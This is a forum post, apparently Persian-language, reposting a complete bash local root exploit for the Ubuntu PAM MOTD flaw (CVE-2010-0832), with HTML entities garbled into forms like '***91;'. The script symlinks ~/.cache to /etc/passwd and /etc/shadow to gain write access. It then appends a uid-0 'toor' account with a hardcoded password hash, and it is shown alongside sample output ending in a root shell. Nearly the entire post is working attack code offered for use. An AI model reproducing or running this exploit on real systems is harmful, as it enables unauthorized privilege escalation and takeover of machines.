کد PHP:
#!/bin/bash
#
***nbsp;Exploit Title: Ubuntu PAM MOTD local root
***nbsp;Date: July 9, 2010
***nbsp;Author: Anonymous
***nbsp;Software Link: http://packages.ubuntu.com/
***nbsp;Version: pam-1.1.0
***nbsp;Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
***nbsp;CVE: CVE-2010-0832
***nbsp;Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
***nbsp;References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
***nbsp;Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
***nbsp;Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
***nbsp; user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
#***91;****93; Ubuntu PAM MOTD local root
#***91;****93; Backuped /home/user/.ssh/authorized_keys
#***91;****93; SSH key set up
#***91;****93; Backuped /home/user/.cache
#***91;****93; spawn ssh
***nbsp; ***91;+***93; owned: /etc/passwd
#***91;****93; spawn ssh
***nbsp; ***91;+***93; owned: /etc/shadow
#***91;****93; Restored /home/user/.cache
#***91;****93; Restored /home/user/.ssh/authorized_keys
#***91;****93; SSH key removed
***nbsp; ***91;+***93; Success! Use password toor to get root
***nbsp; Password:
***nbsp; root@ubuntu:/home/user***nbsp;id
***nbsp; uid=0(root) gid=0(root) groupes=0(root)
#
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "***91;****93; Ubuntu PAM MOTD local root"
***91; -z "$(which ssh)" ***93; && echo "***91;-***93; ssh is a requirement" && exit 1
***91; -z "$(which ssh-keygen)" ***93; && echo "***91;-***93; ssh-keygen is a requirement" && exit 1
***91; -z "$(ps -u root |grep sshd)" ***93; && echo "***91;-***93; a running sshd is a requirement" && exit 1
backup() {
***91; -e "$1" ***93; && ***91; -e "$1".bak ***93; && rm -rf "$1".bak
***91; -e "$1" ***93; || return 0
mv "$1"{,.bak} || return 1
echo "***91;****93; Backuped $1"
}
restore() {
***91; -e "$1" ***93; && rm -rf "$1"
***91; -e "$1".bak ***93; || return 0
mv "$1"{.bak,} || return 1
echo "***91;****93; Restored $1"
}
key_create() {
backup ~/.ssh/authorized_keys
ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
***91; ! -d ~/.ssh ***93; && { mkdir ~/.ssh || return 1; }
mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
echo "***91;****93; SSH key set up"
}
key_remove() {
rm -f "$KEY"
restore ~/.ssh/authorized_keys
echo "***91;****93; SSH key removed"
}
own() {
***91; -e ~/.cache ***93; && rm -rf ~/.cache
ln -s "$1" ~/.cache || return 1
echo "***91;****93; spawn ssh"
ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
***91; -w "$1" ***93; || { echo "***91;-***93; Own $1 failed"; restore ~/.cache; bye; }
echo "***91;+***93; owned: $1"
}
bye() {
key_remove
exit 1
}
KEY="$(mktemp -u)"
key_create || { echo "***91;-***93; Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "***91;-***93; Failed to backup ~/.cache"; bye; }
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "***91;-***93; Failed to restore ~/.cache"; bye; }
key_remove
echo "***91;+***93; Success! Use password toor to get root"
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
07-12-2010, 07:18 PM
Ubuntu PAM MOTD Local Root Exploit
حالت خطی
